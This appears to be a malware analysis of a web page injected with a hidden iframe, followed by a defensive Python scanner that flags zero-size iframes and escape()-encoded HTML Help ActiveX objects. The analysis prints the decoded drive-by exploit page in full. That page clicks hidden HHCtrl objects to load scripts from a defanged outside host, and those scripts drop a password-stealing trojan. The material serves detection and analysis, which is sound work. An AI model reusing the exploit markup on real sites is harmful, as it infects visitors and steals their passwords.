The web page:
hxxp://www.****44mtv.com/vod/index1.htm
has had the following injected into it:
<iframe src="hxxp://www.****26cd.com/test/index.htm" height="0" width="0" MARGINWIDTH="0" MARGINHEIGHT="0" HSPACE="0" VSPACE="0" FRAMEBORDER="0" SCROLLING="no"></iframe>
Part of the code at hxxp://www.****26cd.com/test/index.htm is encoded with escape(). After unescape(), the content is:
<SCRIPT>var Words="<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT><SCRIPT language=VScript src="bbs003302.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'></OBJECT><OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.****26cd.com/test/bbs003302.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT></BODY></HTML> ";document.write(unescape(Words))</SCRIPT>
It downloads 2 files:
1. bbs003302.css
Kaspersky detects it as Trojan-PSW.Win32.Lmir.atj
2. bbs003302.gif
Rising detects it as Exploit.HHCtrl.Jiaozhu
Kaspersky detects it as exploit.VBS.Phel.m
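
A static triage check for the two indicators described above: the zero-size iframe, and the HTML Help ActiveX control (the classid in the decoded page) hidden behind escape() encoding. This is an added example, not part of the original analysis; the sample page, the `example.invalid` host and the function names are constructed for illustration.

```python
import re

# classid of the HTML Help ActiveX control, as it appears in the decoded page above
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

TAG = re.compile(r"<(iframe|object)\b([^>]*)>", re.I)
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def js_unescape(s):
    """Decode JavaScript escape() output (%uXXXX and %XX sequences)."""
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def attrs(raw):
    """Parse the attribute text of one tag into a lower-cased dict."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR.finditer(raw)}

def scan(html, max_layers=3):
    """Return (decode_layer, kind, value) findings, peeling escape() layers."""
    findings, seen = [], set()
    for layer in range(max_layers + 1):
        for tag, raw in TAG.findall(html):
            a, hit = attrs(raw), None
            zero = {"0", "0px"}
            if tag.lower() == "iframe" and a.get("width") in zero and a.get("height") in zero:
                hit = ("hidden-iframe", a.get("src", ""))
            elif tag.lower() == "object" and HHCTRL_CLSID in a.get("classid", "").lower():
                hit = ("hhctrl-object", a.get("id", ""))
            if hit and hit not in seen:
                seen.add(hit)
                findings.append((layer, *hit))
        decoded = js_unescape(html)
        if decoded == html:      # nothing left to decode
            break
        html = decoded
    return findings

# Constructed sample page (not the real one): a 0x0 iframe plus an escape()-encoded OBJECT tag.
SAMPLE = (
    '<html><body>video list'
    '<iframe src="http://injected.example.invalid/test/index.htm" height="0" width="0" FRAMEBORDER="0"></iframe>'
    '<script>document.write(unescape("%3COBJECT%20id%3D%22demo%22%20classid%3D%22clsid%3A'
    'adb880a6-d8ff-11cf-9377-00aa003b7a11%22%3E%3C%2FOBJECT%3E"))</script></body></html>'
)

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The layer number in each finding shows how many escape() decodes were needed before the indicator became visible, which separates plainly injected markup from content that was deliberately obscured.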